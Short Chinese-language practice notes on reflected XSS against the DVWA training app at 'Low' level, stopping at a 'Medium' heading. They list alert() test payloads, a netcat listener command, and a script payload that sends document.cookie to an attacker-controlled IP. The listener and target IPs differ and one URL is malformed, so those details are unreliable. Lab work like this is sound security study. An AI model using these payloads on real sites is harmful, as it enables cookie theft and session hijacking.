反射型XSS-Low
用alert进行弹窗测试验证是否存在XSS
利用火狐的hackbar插件自动生成一个payload进行攻击
<script>alert('XSS');</script>
<script>alert(document.cookie)</script> #获取cookie值
在ip为192.168.83.128的kali中打开临时监听
nc -nvlp 80
在DVWA中输入
<script>new Image().src="http:192.168.83.129/a.php? output="+document.cookie;</script>
反射型XSS- Medium